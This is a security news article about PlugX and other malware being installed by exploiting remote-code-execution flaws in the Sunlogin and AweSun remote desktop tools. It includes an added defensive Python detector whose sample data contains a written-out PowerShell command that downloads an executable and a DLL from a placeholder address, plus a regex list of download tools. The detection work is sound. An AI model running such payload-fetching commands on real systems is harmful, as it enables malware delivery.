System and software vulnerabilities are the prime opportunity for cybercriminals to act and deploy malware on victims' systems. The industry still hasn't recovered from the Log4Shell flaw, which was exploited by numerous groups worldwide. Now two new flaws are in the spotlight, and this time the operators of the PlugX malware are preying on Sunlogin and AweSun users.
PlugX has been around for quite some time, and it recently targeted Windows users via fake Windows debugging tools. In this campaign, PlugX is back, targeting new remote desktop tools in hopes of taking full control of victims' devices.
When it comes to this malware family, victims have plenty of questions. How dangerous are the vulnerabilities? Is the China-based group Lucky Mouse behind the campaign? We answer these questions in the article below.
Remote Desktop Tools Compromised – PlugX Malware Strikes
As mentioned, system vulnerabilities can cause a lot of damage, especially when they are found in critical tools such as remote desktop software.
But when a cybercrime group such as Lucky Mouse is behind the attack, things can take a far more dangerous turn, as these China-based actors have carried out large-scale attacks in the past.
The group is well known for using the HyperBro, PlugX, and SysUpdate malware families. But is it the one behind this vulnerability exploitation?
According to AhnLab Security Emergency Response Center (ASEC), cybercriminals have used these vulnerabilities to deploy the following:
- Sliver post-exploitation framework
- XMRig cryptocurrency miner
- Gh0st RAT
- Paradise ransomware
PlugX is merely the latest family to join the mix. Once installed on a device, the malware can take control of the entire system and harvest personal information. Here's what the cybersecurity firm had to say about the current campaign:
“Sunlogin’s remote code execution vulnerability (CNVD-2022-10270 / CNVD-2022-03672) is still being used for attacks even now ever since its exploit code was disclosed.
AweSun is also a remote control program developed in China and, while its specific vulnerability has not been identified, it is presumed that a similar RCE vulnerability to that of Sunlogin had been disclosed.
The same threat actors performed an RCE vulnerability exploitation on both Sunlogin and AweSun to install Sliver C2.
A previous blog post has covered the cases that later occurred where similar vulnerability exploitations were used to install the Paradise ransomware.”
Once the threat actors successfully exploit the flaw, they can immediately execute a PowerShell command that retrieves an executable and a DLL file from a remote server.
“When the backdoor, PlugX, is installed, threat actors can gain control over the infected system without the knowledge of the user.”
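As an added defender-side example (not from the article or from ASEC), the following Python flags the chain described above in process-creation records: a remote-control tool spawning a shell, and PowerShell fetching both an executable and a DLL. The Sunlogin/AweSun process names, the sample records and the 198.51.100.7 address are all constructed assumptions, not values from the article.

```python
import re
from dataclasses import dataclass

# The two tools' process names are ASSUMED for this illustration (the article
# does not state them); verify the real binary names on your own hosts.
REMOTE_TOOLS = {"sunloginclient.exe", "awesun.exe"}
# Common ways a PowerShell one-liner pulls a file from a remote server.
DOWNLOAD = re.compile(r"invoke-webrequest|\biwr\b|downloadfile|downloadstring|"
                      r"start-bitstransfer|\bcurl\b|\bwget\b", re.IGNORECASE)
PAYLOAD_EXT = re.compile(r"\.(exe|dll)\b", re.IGNORECASE)

@dataclass
class ProcEvent:
    """One process-creation record (Sysmon event 1 / Security 4688 style)."""
    parent_image: str
    image: str
    command_line: str

def classify(ev: ProcEvent) -> list:
    """Return the reasons an event matches the exploit -> PowerShell -> download chain."""
    parent = ev.parent_image.rsplit("\\", 1)[-1].lower()
    child = ev.image.rsplit("\\", 1)[-1].lower()
    reasons = []
    if parent in REMOTE_TOOLS and child in {"powershell.exe", "pwsh.exe", "cmd.exe"}:
        reasons.append(f"shell spawned by remote-control tool {parent}")
    if child in {"powershell.exe", "pwsh.exe"} and DOWNLOAD.search(ev.command_line):
        reasons.append("PowerShell download primitive")
        # The article describes an executable plus a DLL being retrieved together.
        exts = {m.group(1).lower() for m in PAYLOAD_EXT.finditer(ev.command_line)}
        if {"exe", "dll"} <= exts:
            reasons.append("fetches both an executable and a DLL")
    return reasons

def scan(events) -> list:
    hits = []
    for ev in events:
        reasons = classify(ev)
        if reasons:
            hits.append((ev.command_line, reasons))
    return hits

# Constructed sample records; 198.51.100.7 is a documentation address, not a real IoC.
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Sunlogin\SunloginClient.exe", PS,
              r'powershell -c "iwr http://198.51.100.7/a.exe -OutFile C:\Users\Public\a.exe; '
              r'iwr http://198.51.100.7/a.dll -OutFile C:\Users\Public\a.dll"'),
    ProcEvent(r"C:\Windows\explorer.exe", PS, r"powershell -c Get-ChildItem C:\Temp"),
    ProcEvent(r"C:\Program Files\AweSun\AweSun.exe", r"C:\Windows\System32\cmd.exe", "cmd /c whoami"),
]
```

Run `scan(SAMPLE_EVENTS)` to see which records are flagged and why; the benign explorer-launched PowerShell record raises nothing.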
Yes, this PlugX malware is dangerous and can cost users dearly in terms of data. Unfortunately for users, the security firm's findings didn't stop there.
The researchers did point out that PlugX is commonly used by one particular group in China. While the group wasn't named, Lucky Mouse might have a hand in this.
New Vulnerabilities – A Backdoor to Maliciousness
PlugX malware has made its way onto the Chinese remote control programs Sunlogin and AweSun through new vulnerabilities.
Flaws are bound to be exploited; it's up to the software vendor to patch them as soon as possible to prevent malicious activity.
If you're using these tools, make sure to install the latest updates. PlugX isn't a malware variant you want lurking within your systems.